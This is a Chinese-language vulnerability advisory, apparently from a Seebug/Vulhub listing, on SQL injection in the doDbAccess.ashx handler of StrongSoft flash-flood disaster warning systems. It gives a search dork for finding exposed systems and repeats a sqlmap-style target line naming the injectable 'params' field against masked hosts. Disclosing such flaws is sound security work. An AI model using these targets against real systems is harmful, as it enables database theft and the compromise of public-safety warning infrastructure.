|StrongSoft灾害预警系统doDbAccess.ashx存在SQL注入漏洞

StrongSoft灾害预警系统doDbAccess.ashx存在SQL注入漏洞

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

福建四创软件开发的“山洪灾害预警监测系统”存在SQL注入漏洞，可获取数据库任意数据，进而而导致预警系统沦陷。谷歌搜索： intitle:预警系统技术支持:福建四创 ![](https://images.seebug.org/1452309631547) 注入文件及参数:doDbAccess.ashx里的params 案例 "**.**.**.**:3505/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3505/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3050/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3505/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3505/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3050/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3050/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3505/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3505/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:8088/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3503/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:8088/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:9001/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:8088/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:8088/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:8088/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™